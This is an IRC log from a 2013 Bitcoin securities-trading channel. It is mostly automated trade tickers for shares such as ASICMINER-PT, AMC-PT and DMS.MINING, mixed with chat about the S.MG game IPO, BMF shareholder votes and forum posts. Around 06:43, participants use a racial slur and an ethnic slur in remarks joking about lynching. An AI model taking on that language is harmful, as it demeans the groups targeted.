24 06:24:03 and import into my PTs Jul 24 06:24:16 for SMG Jul 24 06:25:06 those imports would suffer the same jurov delays at this moment though Jul 24 06:25:57 what is S.MG anyways, I've tried to find something more substantial than "we're going to make a game" Jul 24 06:26:07 thats it Jul 24 06:26:40 and MPs legacy of immediocrity Jul 24 06:27:08 I don't mind any of that, if there's a sound offer on the table, I just need more info is all Jul 24 06:28:04 hrm immediocrity already coined and not applicable, I was trying to say his history of not being as shit as everyone else Jul 24 06:28:06 did you check out the link provided? Jul 24 06:28:07 http://trilema.com/category/smg/ Jul 24 06:28:10 S.MG pe Trilema - Un blog de Mircea Popescu. Jul 24 06:28:44 ah an mmo Jul 24 06:29:17 [BTCTC] [ASICMINER-PT] 1 @ 4.72 BTC [+] Jul 24 06:29:19 [BTCTC] [ASICMINER-PT] 3 @ 4.715 = 14.145 BTC [-] Jul 24 06:29:21 [BTCTC] [ASICMINER-PT] 3 @ 4.715 = 14.145 BTC [-] Jul 24 06:29:23 [BTCTC] [ASICMINER-PT] 1 @ 4.715 BTC [-] Jul 24 06:29:30 [BTCTC] [ASICMINER-PT] 3 @ 4.713 = 14.139 BTC [-] Jul 24 06:29:32 [BTCTC] [ASICMINER-PT] 2 @ 4.71 = 9.42 BTC [-] Jul 24 06:29:59 [HAVELOCK] [AM100] 99 @ 0.0441 = 4.3659 BTC [-] Jul 24 06:31:37 Duffer http://trilema.com/category/smg/ Jul 24 06:31:40 tghat;s a collection of it all Jul 24 06:32:18 guy beat me to it huh. Jul 24 06:32:24 [HAVELOCK] [HIM] 1 @ 0.23 BTC [+] Jul 24 06:32:27 [HAVELOCK] [HIM] 3 @ 0.231 = 0.693 BTC [+] Jul 24 06:32:31 You might want to add some direct links to that info in your announcement, it's really not easy to find, your announcement is all IPO and no game info Jul 24 06:32:34 thanks ^.^ Jul 24 06:32:59 whose announcement? Jul 24 06:33:05 [BTCTC] [AMC-PT] 32 @ 0.003711 = 0.1188 BTC [-] Jul 24 06:33:07 [BTCTC] [AMC-PT] 65 @ 0.00371 = 0.2412 BTC [-] Jul 24 06:33:09 [BTCTC] [AMC-PT] 225 @ 0.003707 = 0.8341 BTC [-] Jul 24 06:33:11 [BTCTC] [AMC-PT] 753 @ 0.003707 = 2.7914 BTC [-] Jul 24 06:33:47 its at the very top of the contract for the underlying, quite difficult to get more easy to find Jul 24 06:33:49 the link is in the description for the asset isn't it? Jul 24 06:33:58 [BTCTC] [AMC-PT] 16 @ 0.003712 = 0.0594 BTC [+] Jul 24 06:34:00 [BTCTC] [AMC-PT] 231 @ 0.003707 = 0.8563 BTC [-] Jul 24 06:34:55 Monthly statements and further details available here Jul 24 06:35:18 https://bitcointalk.org/index.php?topic=260681.0 Jul 24 06:35:23 @dub Jul 24 06:35:24 [LIVE] [BTC-TC] [TAT.MINIGAME] Ministry of Games passthrough, Bitcoin Game Dev Jul 24 06:35:40 you don't seriously take the forum as the venue of record do you. Jul 24 06:35:47 [BTCTC] [AMC-PT] 16 @ 0.003707 = 0.0593 BTC [-] Jul 24 06:35:49 [BTCTC] [AMC-PT] 17 @ 0.003705 = 0.063 BTC [-] Jul 24 06:35:50 [HAVELOCK] [AM100] 5 @ 0.04477987 = 0.2239 BTC [+] Jul 24 06:35:56 [HAVELOCK] [AM100] 3 @ 0.04477987 = 0.1343 BTC [+] Jul 24 06:36:32 it's the first I've heard of the ipo Jul 24 06:36:36 [BTCTC] [AMC-PT] 1 @ 0.003706 BTC [+] Jul 24 06:36:52 [BTCTC] [DMS.SELLING] 121 @ 0.0198 = 2.3958 BTC [-] Jul 24 06:37:09 the ipo happened a month ago eh Jul 24 06:37:32 ya i see that now :P Jul 24 06:37:34 the forum link you just gave has the link in it Jul 24 06:37:53 [BTCTC] [AMC-PT] 3 @ 0.00379 = 0.0114 BTC [+] Jul 24 06:37:57 [BTCTC] [AMC-PT] 100 @ 0.003706 = 0.3706 BTC [-] Jul 24 06:38:27 ya i just didn't see what was staring me in the face Jul 24 06:41:00 you know that can be dangerous. Jul 24 06:41:30 seems likely that filing is reall since its on teh SECs site Jul 24 06:42:09 I mean, they name the court Jul 24 06:43:00 [HAVELOCK] [AM100] 35 @ 0.04477987 = 1.5673 BTC [+] Jul 24 06:43:12 maybe the docketing is behind Jul 24 06:43:21 lack of financial crime in texus? more your nigger hangings and sodomy Jul 24 06:44:00 is sodomy still a crime in twxas ?! Jul 24 06:44:35 depends if its a messican getting soddomised Jul 24 06:45:58 [BTCTC] [DMS.PURCHASE] 10 @ 0.03369 = 0.3369 BTC [+] Jul 24 06:49:56 [HAVELOCK] [SDSTM] 1 @ 0.01095 BTC [-] Jul 24 06:51:22 [HAVELOCK] [SDSTM] 1 @ 0.01090001 BTC [-] Jul 24 06:51:24 [HAVELOCK] [SDSTM] 10 @ 0.01090001 = 0.109 BTC [-] Jul 24 06:51:27 [HAVELOCK] [SDSTM] 7 @ 0.0109 = 0.0763 BTC [-] Jul 24 06:51:54 [HAVELOCK] [SDSTM] 2 @ 0.0108 = 0.0216 BTC [-] Jul 24 06:52:10 [HAVELOCK] [SDSTM] 3 @ 0.0107 = 0.0321 BTC [-] Jul 24 06:52:12 [HAVELOCK] [SDSTM] 2 @ 0.0106 = 0.0212 BTC [-] Jul 24 06:52:14 [HAVELOCK] [SDSTM] 8 @ 0.0105 = 0.084 BTC [-] Jul 24 06:52:16 [HAVELOCK] [SDSTM] 3 @ 0.0105 = 0.0315 BTC [-] Jul 24 06:52:18 [HAVELOCK] [SDSTM] 1 @ 0.01047173 BTC [-] Jul 24 06:52:21 [HAVELOCK] [SDSTM] 3 @ 0.0103 = 0.0309 BTC [-] Jul 24 06:52:23 [HAVELOCK] [SDSTM] 4 @ 0.01010001 = 0.0404 BTC [-] Jul 24 06:52:25 [HAVELOCK] [SDSTM] 3 @ 0.0101 = 0.0303 BTC [-] Jul 24 06:52:27 [HAVELOCK] [SDSTM] 20 @ 0.01000001 = 0.2 BTC [-] Jul 24 06:52:29 [HAVELOCK] [SDSTM] 32 @ 0.01 = 0.32 BTC [-] Jul 24 06:52:31 [BTCTC] [AMC-PT] 2 @ 0.003789 = 0.0076 BTC [+] Jul 24 06:53:20 [BTCTC] [AMC-PT] 8 @ 0.003709 = 0.0297 BTC [-] Jul 24 07:01:31 [BTCTC] [DMS.MINING] 75 @ 0.01301 = 0.9758 BTC [-] Jul 24 07:03:11 [BTCTC] [AMC-PT] 7 @ 0.003789 = 0.0265 BTC [+] Jul 24 07:06:17 [BTCTC] [BASIC-MINING] 3 @ 0.5893 = 1.7679 BTC [+] Jul 24 07:07:47 [BTCTC] [BASIC-MINING] 1 @ 0.5894 BTC [+] Jul 24 07:10:17 [BTCTC] [BASIC-MINING] 2 @ 0.5894 = 1.1788 BTC [+] Jul 24 07:21:06 [BTCTC] [BMF] 22 @ 0.032 = 0.704 BTC [-] Jul 24 07:21:29 [BTCTC] [TAT.ASICMINER] 13 @ 0.0465 = 0.6045 BTC [-] Jul 24 07:27:23 hey usagi Jul 24 07:28:30 If I remember, you emailed BMF shareholders a few weeks ago about voting Jul 24 07:28:46 [BTCTC] [AMC-PT] 14 @ 0.00379 = 0.0531 BTC [+] Jul 24 07:28:58 I read this email after the time to vote had passed Jul 24 07:29:18 are you going to list or liquidate bmf? Jul 24 07:30:17 [BTCTC] [AMC-PT] 4 @ 0.003799 = 0.0152 BTC [+] Jul 24 07:30:30 [BTCTC] [AMC-PT] 9 @ 0.0038 = 0.0342 BTC [+] Jul 24 07:30:33 [BTCTC] [AMC-PT] 434 @ 0.003808 = 1.6527 BTC [+] Jul 24 07:30:38 [BTCTC] [AMC-PT] 1000 @ 0.003809 = 3.809 BTC [+] Jul 24 07:30:42 [BTCTC] [AMC-PT] 200 @ 0.003845 = 0.769 BTC [+] **** BEGIN LOGGING AT Wed Jul 24 07:36:14 2013 Jul 24 07:37:52 http://bitcoinmagazine.com/amagi-metals-to-lose-bank-account/ Jul 24 07:37:58 Amagi Metals to Lose Bank Account | Bitcoin MagazineBitcoin Magazine Jul 24 07:38:24 [MPEX] [S.MPOE] 3924 @ 0.00080077 = 3.1422 BTC [+] Jul 24 07:40:59 [BTCTC] [AMC-PT] 38 @ 0.003789 = 0.144 BTC [-] Jul 24 07:42:06 [BTCTC] [DMS.SELLING] 6 @ 0.02099 = 0.1259 BTC [+] Jul 24 07:42:52 [BTCTC] [AMC-PT] 4 @ 0.00385 = 0.0154 BTC [+] Jul 24 07:44:09 USA to lose all industries forever | Plainobvious Daily Jul 24 07:45:49 lol Jul 24 07:46:20 was going to say sopmethin along those lines but you;'ve probably done a better job. Jul 24 07:48:48 US government can resort to hooking up the citizens to harvest organic compunds and farm the population. Jul 24 07:49:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [-] Jul 24 07:49:48 Once there's nothing left but the citizens Jul 24 07:51:08 http://www.theverge.com/2013/7/23/4548878/pirate-radio-dies-hard-in-brooklyn-and-the-bronx Jul 24 07:51:10 As police crack down on pirate radio, broadcasters resist the move online | The Verge Jul 24 07:57:03 Hmmmm to trust that amc will drop to. 0035 in the middle of the night or not to trust. Jul 24 08:00:03 What ever happened to nasty Jul 24 08:01:17 [BTCTC] [DMS.MINING] 4 @ 0.01319 = 0.0528 BTC [+] Jul 24 08:01:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [-] Jul 24 08:03:39 [BTCTC] [BTC-BOND] 9 @ 0.01 = 0.09 BTC [+] Jul 24 08:04:07 [BTCTC] [BASIC-MINING] 2 @ 0.5894 = 1.1788 BTC [+] Jul 24 08:08:16 https://bitcointalk.org/index.php?topic=261465.0 Jul 24 08:08:21 Yifu Avalon, Bitsyncom Batch #2 not Recieved, no response Jul 24 08:12:28 Oh piss off, leave me alone *sniff* Jul 24 08:15:11 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003201 = 0.3201 BTC [-] Jul 24 08:15:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0032 BTC [-] Jul 24 08:15:14 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003188 = 0.3188 BTC [-] Jul 24 08:15:15 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.003182 = 0.0477 BTC [-] Jul 24 08:15:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003165 BTC [-] Jul 24 08:15:18 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00314 = 0.314 BTC [-] Jul 24 08:15:19 [BTCTC] [TAT.VIRTUALMINE] 83 @ 0.00314 = 0.2606 BTC [-] Jul 24 08:15:19 [HAVELOCK] [AM100] 5 @ 0.0439 = 0.2195 BTC [-] Jul 24 08:15:23 [HAVELOCK] [AM100] 10 @ 0.04381251 = 0.4381 BTC [-] Jul 24 08:15:31 [HAVELOCK] [AM100] 1 @ 0.0438125 BTC [-] Jul 24 08:15:38 [HAVELOCK] [AM100] 30 @ 0.04381236 = 1.3144 BTC [-] Jul 24 08:15:42 [BTCTC] [AMC-PT] 150 @ 0.003845 = 0.5768 BTC [-] Jul 24 08:15:50 [HAVELOCK] [AM100] 99 @ 0.04381235 = 4.3374 BTC [-] Jul 24 08:15:58 [HAVELOCK] [AM100] 1 @ 0.0435 BTC [-] Jul 24 08:16:02 [HAVELOCK] [AM100] 15 @ 0.04334 = 0.6501 BTC [-] Jul 24 08:16:06 [HAVELOCK] [AM100] 180 @ 0.043201 = 7.7762 BTC [-] Jul 24 08:16:18 [HAVELOCK] [AM100] 50 @ 0.04320088 = 2.16 BTC [-] Jul 24 08:16:29 [HAVELOCK] [AM100] 14 @ 0.04312 = 0.6037 BTC [-] Jul 24 08:16:34 [HAVELOCK] [AM100] 17 @ 0.0431 = 0.7327 BTC [-] Jul 24 08:16:37 [HAVELOCK] [AM100] 178 @ 0.0430001 = 7.654 BTC [-] Jul 24 08:16:39 [BTCTC] [TAT.MINIGAME] 50 @ 0.00098 = 0.049 BTC [-] Jul 24 08:16:41 [BTCTC] [TAT.MINIGAME] 10 @ 0.0009899 = 0.0099 BTC [+] Jul 24 08:16:42 [BTCTC] [TAT.MINIGAME] 50 @ 0.00099 = 0.0495 BTC [+] Jul 24 08:16:43 [BTCTC] [TAT.MINIGAME] 590 @ 0.001 = 0.59 BTC [+] Jul 24 08:16:44 [HAVELOCK] [AM100] 2 @ 0.043 = 0.086 BTC [-] Jul 24 08:16:47 [HAVELOCK] [AM100] 388 @ 0.04285003 = 16.6258 BTC [-] Jul 24 08:16:56 [HAVELOCK] [AM100] 161 @ 0.04285002 = 6.8989 BTC [-] Jul 24 08:17:02 [HAVELOCK] [AM100] 250 @ 0.04285001 = 10.7125 BTC [-] Jul 24 08:19:23 [BTCTC] [DMS.PURCHASE] 15 @ 0.03369 = 0.5054 BTC [+] Jul 24 08:22:42 [BTCTC] [TAT.MINIGAME] 622 @ 0.000401 = 0.2494 BTC [-] Jul 24 08:22:44 [BTCTC] [TAT.MINIGAME] 2000 @ 0.0004 = 0.8 BTC [-] Jul 24 08:22:45 [BTCTC] [TAT.MINIGAME] 2 @ 0.000362 = 0.0007 BTC [-] Jul 24 08:22:46 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000356 = 0.356 BTC [-] Jul 24 08:22:54 [BTCTC] [TAT.MINIGAME] 2 @ 0.000356 = 0.0007 BTC [-] Jul 24 08:23:17 [BTCTC] [TAT.MINIGAME] 120 @ 0.00035 = 0.042 BTC [-] Jul 24 08:24:06 [BTCTC] [TAT.MINIGAME] 30 @ 0.0003255 = 0.0098 BTC [-] Jul 24 08:24:08 [BTCTC] [TAT.MINIGAME] 4970 @ 0.0002898 = 1.4403 BTC [-] Jul 24 08:25:39 [HAVELOCK] [AM100] 8 @ 0.0428 = 0.3424 BTC [-] Jul 24 08:26:20 [BTCTC] [TAT.MINIGAME] 2846 @ 0.0002898 = 0.8248 BTC [-] Jul 24 08:28:15 [BTCTC] [TAT.MINIGAME] 1300 @ 0.000333 = 0.4329 BTC [+] Jul 24 08:30:51 [BTCTC] [TAT.MINIGAME] 150 @ 0.000333 = 0.05 BTC [+] Jul 24 08:31:59 [BTCTC] [TAT.MINIGAME] 930 @ 0.000333 = 0.3097 BTC [+] Jul 24 08:32:07 [HAVELOCK] [AM100] 1 @ 0.0447769 BTC [+] Jul 24 08:32:10 [BTCTC] [TAT.MINIGAME] 1374 @ 0.000356 = 0.4891 BTC [+] Jul 24 08:32:13 [BTCTC] [DMS.SELLING] 25 @ 0.02099 = 0.5248 BTC [+] Jul 24 08:33:40 [HAVELOCK] [SMG] 10 @ 0.00028885 = 0.0029 BTC [+] Jul 24 08:34:20 [MPEX] [S.MPOE] 13842 @ 0.00080038 = 11.0789 BTC [-] Jul 24 08:34:22 [MPEX] [S.MPOE] 3394 @ 0.00079735 = 2.7062 BTC [-] Jul 24 08:34:32 [BTCTC] [DMS.SELLING] 28 @ 0.02099 = 0.5877 BTC [+] Jul 24 08:35:02 [BTCTC] [DMS.SELLING] 6 @ 0.021 = 0.126 BTC [+] Jul 24 08:35:04 [BTCTC] [DMS.SELLING] 44 @ 0.021 = 0.924 BTC [+] Jul 24 08:36:16 [BTCTC] [TAT.MINIGAME] 100 @ 0.00091 = 0.091 BTC [+] Jul 24 08:36:33 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [-] Jul 24 08:36:35 [BTCTC] [ASICMINER-PT] 4 @ 4.71 = 18.84 BTC [-] Jul 24 08:38:00 https://bitcointalk.org/index.php?topic=261066.0 Jul 24 08:38:01 ahahaha Jul 24 08:38:03 [BTCTC] [TAT.MINIGAME] 622 @ 0.000899 = 0.5592 BTC [-] Jul 24 08:38:07 [WTS] Extremely Secure GPG keys Jul 24 08:39:40 omfg Jul 24 08:42:08 right ? Jul 24 08:42:36 smh its just staggering Jul 24 08:42:37 if only that kid had gone to school. Jul 24 08:42:47 srsly Jul 24 08:43:53 or at least read a few books like Applied Crypto and a lot of white papers. Jul 24 08:45:49 nah, his problem is fundamental. Jul 24 08:45:58 he just doesn't understand wtf the world around him is Jul 24 08:46:03 captive in a paper bag Jul 24 08:46:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0465 BTC [-] Jul 24 08:46:24 *nod* Jul 24 08:48:14 that might be up there in the top 10 dumbest posts ive seen on that site Jul 24 08:49:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.04533 = 0.136 BTC [-] Jul 24 08:52:22 *sigh* Jul 24 08:54:33 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003483 = 0.0104 BTC [+] Jul 24 08:54:35 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003484 = 0.3484 BTC [+] Jul 24 08:54:35 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.0035 = 1.75 BTC [+] Jul 24 08:54:37 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00359 = 0.359 BTC [+] Jul 24 08:54:38 [BTCTC] [TAT.VIRTUALMINE] 252 @ 0.003595 = 0.9059 BTC [+] Jul 24 08:54:39 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003597 = 0.3597 BTC [+] Jul 24 08:54:41 [BTCTC] [TAT.VIRTUALMINE] 445 @ 0.00362 = 1.6109 BTC [+] Jul 24 08:55:28 [BTCTC] [AMC-PT] 150 @ 0.003845 = 0.5768 BTC [-] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 40 @ 0.0131 = 0.524 BTC [-] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 11 @ 0.01319 = 0.1451 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 38 @ 0.01319 = 0.5012 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 82 @ 0.0132 = 1.0824 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 100 @ 0.0132 = 1.32 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 3 @ 0.0132 = 0.0396 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 38 @ 0.01326 = 0.5039 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 80 @ 0.01327 = 1.0616 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 487 @ 0.01329 = 6.4722 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 6 @ 0.01329 = 0.0797 BTC [+] Jul 24 09:04:38 [BTCTC] [DMS.MINING] 3022 @ 0.0133 = 40.1926 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 50 @ 0.0135 = 0.675 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 72 @ 0.01369 = 0.9857 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 2 @ 0.01379 = 0.0276 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 10 @ 0.0138 = 0.138 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 3 @ 0.01389 = 0.0417 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 16 @ 0.01389 = 0.2222 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 20 @ 0.0139 = 0.278 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 10 @ 0.01395 = 0.1395 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 130 @ 0.01399 = 1.8187 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 30 @ 0.014 = 0.42 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 50 @ 0.014 = 0.7 BTC [+] Jul 24 09:04:39 [BTCTC] [DMS.MINING] 65 @ 0.01415 = 0.9198 BTC [+] Jul 24 09:04:39 gogogo Jul 24 09:04:48 is this good ? Jul 24 09:05:09 rally on PMBs? Jul 24 09:05:13 not really Jul 24 09:05:48 [BTCTC] [TAT.VIRTUALMINE] 52 @ 0.003155 = 0.1641 BTC [-] Jul 24 09:05:59 [BTCTC] [DMS.MINING] 1530 @ 0.01458 = 22.3074 BTC [+] Jul 24 09:06:01 was this the synthetic dual bond thing ? Jul 24 09:06:29 yeah Jul 24 09:06:34 [BTCTC] [ASICMINER-PT] 2 @ 4.755 = 9.51 BTC [+] Jul 24 09:06:35 [BTCTC] [ASICMINER-PT] 1 @ 4.76 BTC [+] Jul 24 09:07:04 from Deprived Jul 24 09:07:17 pretty neat trick if you haven't read how it works Jul 24 09:08:10 yeah i've read. i read it once in 2012 too, when brendio came up with it Jul 24 09:08:15 well, something very similar anyway Jul 24 09:08:15 [BTCTC] [GSDPT] 1 @ 0.00332 BTC [-] Jul 24 09:09:36 to be fair, no claim was made as to originality Jul 24 09:09:45 [BTCTC] [BITVPS] 9 @ 0.002141 = 0.0193 BTC [-] Jul 24 09:09:47 [BTCTC] [BITVPS] 1 @ 0.002142 BTC [+] Jul 24 09:09:50 [BTCTC] [TAT.ASICMINER] 23 @ 0.04533 = 1.0426 BTC [-] Jul 24 09:12:14 [MPEX] [S.MPOE] 3897 @ 0.00078288 = 3.0509 BTC [-] Jul 24 09:12:54 [BTCTC] [AMC-PT] 200 @ 0.003845 = 0.769 BTC [-] Jul 24 09:13:40 [BTCTC] [ASICMINER-PT] 3 @ 4.79 = 14.37 BTC [+] Jul 24 09:13:40 [BTCTC] [ASICMINER-PT] 1 @ 4.79 BTC [+] Jul 24 09:13:41 [BTCTC] [GSDPT] 4 @ 0.00332 = 0.0133 BTC [-] Jul 24 09:14:09 [BTCTC] [AMC-PT] 69 @ 0.003847 = 0.2654 BTC [+] Jul 24 09:15:09 [BTCTC] [AMC-PT] 2 @ 0.003847 = 0.0077 BTC [+] Jul 24 09:18:30 [BTCTC] [ASICMINER-PT] 1 @ 4.792 BTC [+] Jul 24 09:29:34 [BTCTC] [DMS.MINING] 240 @ 0.01478 = 3.5472 BTC [+] Jul 24 09:30:05 [BTCTC] [ASICMINER-PT] 1 @ 4.761 BTC [-] Jul 24 09:30:07 [BTCTC] [ASICMINER-PT] 1 @ 4.76 BTC [-] Jul 24 09:30:09 [BTCTC] [ASICMINER-PT] 2 @ 4.75 = 9.5 BTC [-] Jul 24 09:31:08 [BTCTC] [DMS.PURCHASE] 104 @ 0.03369 = 3.5038 BTC [+] Jul 24 09:33:47 [BTCTC] [DMS.PURCHASE] 400 @ 0.03379 = 13.516 BTC [+] Jul 24 09:34:41 _.-^ Jul 24 09:36:27 [MPEX] [S.MPOE] 6110 @ 0.00079549 = 4.8604 BTC [+] Jul 24 09:36:29 [MPEX] [S.MPOE] 290 @ 0.00080013 = 0.232 BTC [+] Jul 24 09:37:24 [BTCTC] [AMC-PT] 7 @ 0.003751 = 0.0263 BTC [-] Jul 24 09:37:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.0465 = 0.465 BTC [+] Jul 24 09:37:36 [BTCTC] [TAT.ASICMINER] 29 @ 0.0465 = 1.3485 BTC [+] Jul 24 09:37:37 [BTCTC] [TAT.ASICMINER] 17 @ 0.0465 = 0.7905 BTC [+] Jul 24 09:38:55 [BTCTC] [AMC-PT] 27 @ 0.003848 = 0.1039 BTC [+] Jul 24 09:39:18 [BTCTC] [AMC-PT] 1 @ 0.003848 BTC [+] Jul 24 09:42:48 4 Jul 24 09:43:05 heh whoops Jul 24 09:43:27 [HAVELOCK] [SMG] 66 @ 0.00028885 = 0.0191 BTC [+] Jul 24 09:44:10 [HAVELOCK] [HIM] 5 @ 0.23199999 = 1.16 BTC [+] Jul 24 09:46:05 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003151 = 0.3151 BTC [-] Jul 24 09:46:38 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.00315 = 0.041 BTC [-] Jul 24 09:46:59 [BTCTC] [TAT.VIRTUALMINE] 46 @ 0.00314 = 0.1444 BTC [-] Jul 24 09:47:37 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.003132 = 0.0438 BTC [-] Jul 24 09:47:48 [BTCTC] [DMS.MINING] 75 @ 0.01478 = 1.1085 BTC [+] Jul 24 09:47:59 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003131 = 0.3131 BTC [-] Jul 24 09:48:01 [BTCTC] [ASICMINER-PT] 2 @ 4.767 = 9.534 BTC [+] Jul 24 09:48:37 [BTCTC] [TAT.VIRTUALMINE] 52 @ 0.003132 = 0.1629 BTC [+] Jul 24 09:48:56 publio originality is overrated in finance anyway Jul 24 09:49:28 [BTCTC] [TAT.VIRTUALMINE] 675 @ 0.00313 = 2.1128 BTC [-] Jul 24 09:49:35 [BTCTC] [DMS.MINING] 44 @ 0.01478 = 0.6503 BTC [+] Jul 24 09:49:42 [BTCTC] [DMS.MINING] 80 @ 0.01478 = 1.1824 BTC [+] Jul 24 09:51:06 I've got to give it to usagi Jul 24 09:51:39 [BTCTC] [DMS.MINING] 2000 @ 0.01479 = 29.58 BTC [+] Jul 24 09:51:56 can never quite tell if its insane or a masterful troll Jul 24 09:52:06 [BTCTC] [TAT.VIRTUALMINE] 325 @ 0.00313 = 1.0173 BTC [-] Jul 24 09:52:40 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.003124 = 0.0562 BTC [-] Jul 24 09:52:46 [WTS] Extremely Secure GPG keys Jul 24 09:52:47 in a trollish perspective he's above pietila. Jul 24 09:53:32 yep, would be on of the greats Jul 24 09:54:01 [BTCTC] [DMS.MINING] 278 @ 0.01479 = 4.1116 BTC [+] Jul 24 09:54:09 [BTCTC] [DMS.PURCHASE] 45 @ 0.03379 = 1.5206 BTC [+] Jul 24 09:54:29 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.0031 = 0.372 BTC [-] Jul 24 09:54:47 dude bitcoin rocks Jul 24 09:54:58 i traded some bitcents for like... billions of eve isk Jul 24 09:55:13 im uber rich in eve now. who knew. Jul 24 09:56:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00325 BTC [+] Jul 24 09:57:43 lol usagi is that a fucking RP realm? Jul 24 09:58:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003249 BTC [-] Jul 24 09:58:24 [BTCTC] [DMS.MINING] 35 @ 0.01479 = 0.5177 BTC [+] Jul 24 09:58:30 [BTCTC] [AMC-PT] 7 @ 0.003846 = 0.0269 BTC [-] Jul 24 09:58:32 [BTCTC] [AMC-PT] 300 @ 0.003847 = 1.1541 BTC [+] Jul 24 09:58:33 [BTCTC] [AMC-PT] 572 @ 0.003848 = 2.2011 BTC [+] Jul 24 09:58:54 [BTCTC] [DMS.PURCHASE] 145 @ 0.03379 = 4.8996 BTC [+] Jul 24 10:00:01 [BTCTC] [AMC-PT] 41 @ 0.003849 = 0.1578 BTC [+] Jul 24 10:00:03 [BTCTC] [AMC-PT] 63 @ 0.003849 = 0.2425 BTC [+] Jul 24 10:01:27 mp: make pink cock-like ships and crash them into everyone Jul 24 10:01:40 heh, if the GPG post was a troll - you got me; there are so many trolls/scams poste to btctalk i can't tell the difference any more Jul 24 10:02:05 s/poste/posts Jul 24 10:02:15 [BTCTC] [DMS.MINING] 335 @ 0.01478 = 4.9513 BTC [-] Jul 24 10:02:45 dub actually i think ima make myself a nice industrialist. Jul 24 10:03:04 [BTCTC] [DMS.SELLING] 11 @ 0.021 = 0.231 BTC [+] Jul 24 10:04:00 [BTCTC] [BASIC-MINING] 2 @ 0.55 = 1.1 BTC [-] Jul 24 10:04:02 [BTCTC] [BASIC-MINING] 2 @ 0.525 = 1.05 BTC [-] Jul 24 10:04:04 [BTCTC] [BASIC-MINING] 2 @ 0.5247 = 1.0494 BTC [-] Jul 24 10:04:07 [BTCTC] [BASIC-MINING] 4 @ 0.5243 = 2.0972 BTC [-] Jul 24 10:04:10 [BTCTC] [BASIC-MINING] 7 @ 0.5243 = 3.6701 BTC [-] Jul 24 10:04:12 [BTCTC] [BASIC-MINING] 3 @ 0.5243 = 1.5729 BTC [-] Jul 24 10:04:15 [HAVELOCK] [HIM] 3 @ 0.22300009 = 0.669 BTC [-] Jul 24 10:04:42 [HAVELOCK] [AM100] 15 @ 0.0446999 = 0.6705 BTC [-] Jul 24 10:04:46 [BTCTC] [DMS.SELLING] 189 @ 0.02139 = 4.0427 BTC [+] Jul 24 10:05:11 I am the King of Elwynn Forest - Forums - World of Warcraft Jul 24 10:06:02 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.003016 = 0.1206 BTC [-] Jul 24 10:06:22 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003003 = 0.015 BTC [-] Jul 24 10:06:39 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003 = 0.006 BTC [-] Jul 24 10:08:19 [BTCTC] [BASIC-MINING] 1 @ 0.5244 BTC [+] Jul 24 10:08:21 [BTCTC] [BASIC-MINING] 5 @ 0.5243 = 2.6215 BTC [-] Jul 24 10:08:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.04651 BTC [+] Jul 24 10:09:36 [BTCTC] [DMS.SELLING] 30 @ 0.02139 = 0.6417 BTC [+] Jul 24 10:12:01 [BTCTC] [BASIC-MINING] 2 @ 0.5243 = 1.0486 BTC [-] Jul 24 10:12:52 [BTCTC] [TAT.ASICMINER] 49 @ 0.04651 = 2.279 BTC [+] Jul 24 10:12:53 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00305 BTC [+] Jul 24 10:12:55 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003149 = 0.3149 BTC [+] Jul 24 10:13:35 [BTCTC] [AMC-PT] 15 @ 0.003849 = 0.0577 BTC [+] Jul 24 10:14:50 [HAVELOCK] [HIM] 2 @ 0.22300008 = 0.446 BTC [-] Jul 24 10:14:54 [BTCTC] [AMC-PT] 260 @ 0.003849 = 1.0007 BTC [+] Jul 24 10:15:07 [HAVELOCK] [HIM] 1 @ 0.22300001 